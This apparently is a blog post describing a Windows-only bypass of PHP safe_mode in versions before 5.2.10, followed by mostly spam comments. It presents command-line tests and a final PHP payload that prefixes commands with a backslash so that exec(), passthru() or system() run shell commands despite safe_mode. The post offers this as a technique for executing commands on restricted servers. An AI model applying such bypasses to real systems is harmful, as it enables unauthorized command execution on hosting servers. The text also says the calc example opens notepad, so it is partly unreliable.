Safe_mode Bypass: PHP < 5.2.10

2:19 PM






Note: This method only works on windows and isn’t discovered by me, but one of the greatest web researchers I know, I just had to share it.





So, to test this, make sure you have php version less than 5.2.10 on a windows machine.
make sure your php.ini file says on for safe_mode or simply by doing


C:\xampp\php>php -n -d safe_mode=on -r “exec(‘notepad’);”

The command “/notepad” is either misspelled or could not be found.

So what does that tell us? its like all safe_mode doing is ad a "/" in whatever input we gave it (would be bad), aside from lots of other bypasses you might think of, one , for windows only, can be used to bypass safe_mode, by using backslashes infront of the command:

C:\xampp\php>php -n -d safe_mode=on -r “exec(‘\calc’);”

Aside from many errors being generated, the code still gets executed and notepad will now pop up.

so our final payload to execute commands while safe_mode is 1 is:

<?php exec('\echo "SHIT" >> notepad.txt'); ?>


works with exec(), passthru, system() functions.

Share This Story

Tags: , ,

You Might Also Like

7 comments

  1. Roshini RSJuly 9, 2015 at 3:46 AM

    Great Post, Actually PHP is a beautiful source for developing a database driven web application, I love this post, thanks for spending your time for discussing about this topic.
    Regards,
    PHP Training in Chennai

    ReplyDelete
  2. James MartinJuly 22, 2015 at 1:41 AM

    This comment has been removed by the author.

    ReplyDelete
  3. gurutermpaper.comSeptember 1, 2015 at 1:31 AM

    Great post! Will try to release your method on my own website! Thanks!

    ReplyDelete
  4. goodstudyskill.orgSeptember 20, 2015 at 4:45 AM

    Much thanks, the information is certainly wholesome! I can see that the searcher is a specialist in the area. As contrasted with the numerous guest posts I have looked over on the question, this one offers advanced viewpoints. This web site frequently furnishes a quantity of interesting posts on the vital concerns. My sister and I read them constantly.

    ReplyDelete
  5. http://customsessay.com/cv-writing-service/October 24, 2015 at 4:00 AM

    The investigation is surely helpful! Without a doubt, the researcher is talent in the field of speciality.

    ReplyDelete
  6. mary BrownMay 27, 2016 at 4:32 AM

    PHP Training in chennai | PHP Training Course

    PHP Training in chennai | Online PHP Course

    ReplyDelete
  7. brentpapeApril 15, 2017 at 1:45 AM

    Thanks for a good post. I have tested this method and it worked for me. I even shared it to the readers of my blog https://law-essay-profy.com/buy-law-essay/. A lot of them are interested in PHP.

    ReplyDelete

Note: Only a member of this blog may post a comment.